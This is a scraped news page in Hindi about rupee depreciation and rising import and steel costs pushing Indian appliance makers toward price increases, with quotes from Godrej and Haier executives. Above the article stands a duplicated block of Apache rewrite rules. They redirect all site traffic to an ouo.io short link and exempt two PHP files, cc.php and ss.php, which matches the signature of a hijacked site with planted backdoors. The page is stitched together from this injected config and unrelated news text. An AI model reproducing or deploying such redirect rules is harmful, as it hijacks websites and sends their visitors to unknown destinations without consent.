
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 321
Nextनई दिल्ली। सीमा शुल्क में हालिया वृद्धि से जूझ रहे कंज्यूमर ड्यूरेबल्स और इलेक्ट्रॉनिक्स कंपनियों को डॉलर के मुकाबले रुपये में आ रही नरमी से दोहरी मार झेलनी पड़ रही है। शुक्रववार को रुपया डॉलर के मुकाबले 65.17 पर आ गया, जो पिछले तीन माह निचला स्तर है और आने वाले हफ्तों में एक डॉलर का भाव 66 रुपये तक पहुंचने की आशंका है। ऐसे में आयातित पुर्जों पर निर्भर कंपनियां अपने उत्पादों के दाम बढ़ाने की संभावना तलाश रही हैं। रुपये में नरमी से आयात करने वाली कंपनियों को उत्पादों के लिए डॉलर मद में ज्यादा रकम का भुगतान करना पड़ता है। ऐसे में वह बढ़ी हुई लागत का भार ग्राहकों पर डालने की तैयारी कर रही हैं। 6,000 से 7,000 करोड़ रुपये का घरेलू इलेक्ट्रॉनिक्स एवं अप्लाइंसेज बाजार मुख्य रूप से आयातित पुर्जों पर ही निर्भर है। इससे पहले जनवरी और फरवरी के दौरान एयर कंडीशनर विनिर्माताओं ने उत्पादों के लिए नई ऊर्जा लेबलिंग लागू होने से 5 से 6 फीसदी तक दाम बढ़ा दिए हैं।
गोदरेज अप्लाइंसेज के कार्यकारी उपाध्यक्ष और कारोबार प्रमुख कमल नंदी ने कहा, 'रुपये की नरमी चिंता की वजह है क्योंकि इससे आयात महंगा होगा। इसके साथ ही स्टील कीमतों का भी दबाव है।' विश्लेषकों का कहना है कि रेफ्रिजजेरेटर एवं एयर कंडीशनर बनाने में तांबा और स्टील जैसी धातुओं का इस्तेमाल होता है और अमेरिका तथा अन्य देशों में व्यापार युद्घ छिडऩे की आशंका से धातु कीमतों पर असर पड़ सकता है। अगर अन्य देश भी अमेरिका की तरह आयात शुल्क लगाने का निर्णय करते हैं तो स्टील की कीमतों में आगे और तेजी आ सकती है। अमेरिकी राष्ट्रपति डॉनल्ड ट्रंप ने पिछले दिनों स्टील के आयात पर 25 फीसदी का शुल्क लगाने का निर्णय किया है। हायर अप्लाइंसेज इंडिया के अध्यक्ष एरिक ब्रागेंजा ने कहा कि वह स्थिति पर नजर रखे हुए हैं। उन्होंने कहा, 'अगर रुपये में उतार-चढ़ाव बना रहा तो कीमतें बढ़ाने पर विचार किया जाएगा।'